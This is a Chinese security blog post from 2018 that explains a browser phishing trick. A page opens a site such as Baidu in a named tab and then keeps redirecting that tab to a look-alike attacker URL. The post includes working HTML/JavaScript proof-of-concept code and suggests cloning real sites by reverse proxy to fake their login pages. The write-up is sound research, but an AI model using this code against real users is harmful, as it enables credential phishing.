前端黑魔法之远程控制地址栏
作者:admin | 时间:2018-3-14 00:22:19 | 分类:黑客技术 隐藏侧边栏展开侧边栏
由于今天看到一篇文章《危险的 target=”_blank” 与 “opener”》,里面提到了一个老知识点,就是target=”_blank”的时候,新打开的页面可以通过window.opener来控制源页面的URL,进行钓鱼攻击。这个攻击手法我在博客《神奇的opener对象》中也说过,这里就不再赘述了。这篇文章抛出另一种与target有关的钓鱼攻击。
0×01 效果演示
首先可以看一个小例子:http://675ba661.2m1.pw/41593a
(点击查看大图)
见上图,打开上述链接,然后点击“click me”,打开了百度。这时查看地址栏,的的确确是百度,然后我们等待10秒,再次查看地址栏,这个时候已经变成攻击者的网址了;即使此时我们再访问淘宝等页面,只要仍然在这个标签页下,地址栏就仍然会被控制。
0×02 原理说明
上述页面的代码也很简单:
<html> <head><meta charset="utf-8"></head> <body> <a href="https://www.baidu.com" target="baidu" id="baidu" onclick="return start()">click me</a> <script> function start() {
setInterval(function() {
baidu.href="http://675ba661.2m1.pw/baidu";
baidu.click();
}, 10000);
} </script> </body> </html>
如果用户点击了超链接“click me”,这里会启动一个循环定时器,每过10秒钟,将会将超链接的地址更换成一个仿百度的钓鱼网站,并再次点击。(当然,如果是真实攻击的话,最好是做一个真实目标的反代服务器,这个在我另一篇文章《openresty+lua在反向代理服务中的玩法》中也有详细的介绍)
这里,超链接的target属性指定目标URL在哪个页面下打开,就是目标页面的window.name。如果这个a标签的href发生了变化,再次点击链接,页面仍然会在相同的标签页下打开,所以就覆盖了上一次打开的页面。
比如,我们是一个“网址导航”类型的恶意网站,用户在我们网站上打开了百度、淘宝等标签页面,我们将可以根据用户打开的超链接来生成钓鱼页面,伪造这些网站的登录页面,精准地进行钓鱼。我这里就不进行演示了。
0×03 扩展尝试
除了超链接以外,用window.open也可以达到一样的效果:
<html> <head><meta charset="utf-8"></head> <body> <a href="javascript:;" onclick="return start()">click me</a> <script> function start() {
var w = window.open('https://www.baidu.com', 'baidu');
setInterval(function() {
w.location = 'http://675ba661.2m1.pw/baidu' }, 5000)
} </script> </body> </html>
不过,window.open经常会被广告拦截相关的功能给阻止掉,所以可能效果不如直接用超链接。
那么,继续深入研究。这个现象究竟是否和window.name有关呢?那么是不是我们知道了某个页面的name,即可对其页面的URL进行控制?
我们可以做一个实验。
编写A页面( http://a.675ba661.2m1.pw/A_victim ):
<html> <head><meta charset="utf-8"></head> <body> <p>Hello world.</p> <script> window.name = 'baidu'; </script> </body> </html>
编写B页面( http://b.675ba661.2m1.pw/B_attacker ):
<html> <head><meta charset="utf-8"></head> <body> <a href="https://www.baidu.com" target="baidu" id="baidu">click me</a> </body> </html>
A页面是目标网站,其中设置自己的name是baidu;B是攻击者的页面,其中设置target="baidu"
。
显然,我们在B中点击“click me”以后,会打开一个新的页面,而不是修改A页面的URL。这个实验说明,URL的远程控制和window.name没有直接关系,而是和页面的父子关系有关。
0×04 总结
本文所描述的攻击方式和opener的攻击方式比较相似,都是在不能跨域的情况下,控制目标标签页的URL,进而进行钓鱼攻击。
但我觉得这个攻击持久型更佳,因为即使用户在新标签中输入自己的域名,或者又通过超链接点击到其他网站里,这个页面的地址栏永远是受到源页面的控制的。理论上在源页面不关闭的情况下,可以永久控制新页面的地址栏。
*本文原创作者:phithon